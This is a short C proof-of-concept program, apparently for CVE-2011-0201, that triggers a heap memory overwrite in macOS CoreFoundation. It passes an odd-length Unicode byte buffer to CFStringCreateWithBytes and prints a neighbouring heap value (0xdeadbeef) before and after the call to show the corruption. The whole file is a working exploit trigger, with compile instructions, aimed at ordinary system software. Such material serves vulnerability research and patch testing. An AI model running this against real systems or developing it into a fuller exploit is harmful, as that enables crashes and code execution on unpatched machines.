/* gcc -Wall -O2 CVE-2011-0201.c -framework CoreFoundation -o CVE-2011-0201
*/
#include <stdio.h>
#include <CoreFoundation/CoreFoundation.h>

int main(void)
{
  uint8_t buf[1025 + 1] = {0};
  uint32_t *ptr;
  void *tmp = malloc(1024);
  ptr = malloc(1024);
  free(tmp);
  ptr[0] = 0xdeadbeef;
  buf[sizeof(buf) - 2] = 0xba;
  buf[sizeof(buf) - 1] = 0xbe;
  printf("ptr[0] pre call: 0x%04x\n", ptr[0]);
  CFStringCreateWithBytes(NULL, buf, sizeof(buf) - 1, kCFStringEncodingUnicode, true);
  printf("ptr[0] post call: 0x%04x\n", ptr[0]);
  return 0;
}